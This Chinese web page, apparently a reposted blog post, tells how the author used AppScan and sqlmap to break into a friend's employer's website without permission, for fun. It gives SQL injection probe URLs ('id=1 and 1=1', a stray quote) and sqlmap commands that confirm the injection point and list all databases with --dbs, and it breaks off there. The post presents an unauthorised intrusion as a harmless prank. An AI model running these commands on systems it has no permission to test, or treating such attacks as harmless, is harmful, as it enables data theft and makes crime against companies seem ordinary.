您好,欢迎来电子发烧友网! ,新用户?[免费注册]

您的位置:电子发烧友网>源码下载>数值算法/人工智能>

SQL工具注入攻破这家互联网公司

大小:0.5 MB 人气: 2017-10-11 需要积分:1
最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,内心有些小激动,特在此写博文一篇,来记录下我是如何一步步攻破这家互联网公司的。
  【作案工具介绍】
  (1) AppScan渗透扫描工具
  Appscan是Web应用程序渗透测试舞台上使用最广泛的工具之一。它是一个桌面应用程序,它有助于专业安全人员进行Web应用程序自动化脆弱性评估。
  (2) Sqlmap渗透测试工具
  Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
  【作案细节如下】
  首先使用Appscan工具,对www.xxx.com互联网公司的官网进行扫描,扫描结果如下:
  SQL工具注入攻破这家互联网公司
  在这56个安全性问题中,找到你感兴趣的链接,例如下面这条:
  http://www.xxx.com/system/cms/show?id=1
  为何要挑出这一条呢?因为它对于SQL注入比较典型,下面普及下SQL注入常用手法。首先用如下语句,确定该网站是否存在注入点:
  http://192.168.16.128/news.php?id=1原网站
  http://192.168.16.128/news.php?id=1’ 出错或显示不正常
  http://192.168.16.128/news.php?id=1and 1=1 出错或显示不正常
  http://192.168.16.128/news.php?id=1and 1=2 出错或显示不正常
  如果有出错,说明存在注入点。
  在判断完http://www.xxx.com/system/cms/show?id=1该链接存在注入点后,接下来就启动我们的渗透测试工具Sqlmap,进行下一步的注入工作,详细过程如下:
  1) 再次确认目标注入点是否可用:
  python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
  参数
  -u:指定注入点url
  结果:
  SQL工具注入攻破这家互联网公司
  注入结果展示:
  a. 参数id存在基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
  b. 参数id存在基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
  c. 数据库类型为:MySql 5.0.12
  2) 暴库所有数据库:
  一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
  python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1–dbs
  参数:
  –dbs:dbs前面有两条杠,列出所有数据库。

非常好我支持^.^

(0) 0%

不好我反对

(0) 0%

      发表评论

      用户评论
      评价:好评中评差评

      发表评论,获取积分! 请遵守相关规定!